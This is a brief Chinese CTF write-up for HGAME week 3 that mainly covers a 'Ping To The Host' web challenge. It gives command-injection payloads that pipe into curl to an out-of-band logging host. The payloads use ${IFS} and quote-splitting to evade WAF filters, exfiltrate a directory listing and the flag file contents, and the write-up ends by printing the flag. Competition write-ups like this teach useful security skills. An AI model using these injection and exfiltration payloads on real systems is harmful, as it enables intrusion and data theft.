目录
坐大牢呜呜呜
week3[🤡]
misc
Tunnel
记事本打开检索hgame
web
Ping To The Host
ping了很多,回显都是waf
post:
ip=|curl${IFS}http://******.ceye.io/`ls${IFS}/`
空格被过滤,绕过一下
发现ping不通,可能限制了回显一行
用到一个linux命令,sed shell脚本之sed详解 (sed命令 , sed -e , sed s/ new / old / ... ) - Red_Point - 博客园
ip=|curl${IFS}http://******.ceye.io/`ls${IFS}/|sed${IFS}-n${IFS}'/flag/p'`
回显waf,应该是flag被过滤
fla模糊匹配一下
ip=|curl${IFS}http://******.ceye.io/`ls${IFS}/|sed${IFS}-n${IFS}'/fla/p'`
ping出了flag的文件名
flag_is_here_haha
读一下flag,cat,tac好像都过滤了,nl ping不通
反斜杠转义绕过
ip=|curl${IFS}http://******.ceye.io/`ca''t${IFS}/fla*`
单引号绕过
ip=|curl${IFS}http://******.ceye.io/`ca''t${IFS}/fla*`
成功
hgame{p1nG_t0_ComM4nD_ExecUt1on_dAngErRrRrRrR!} |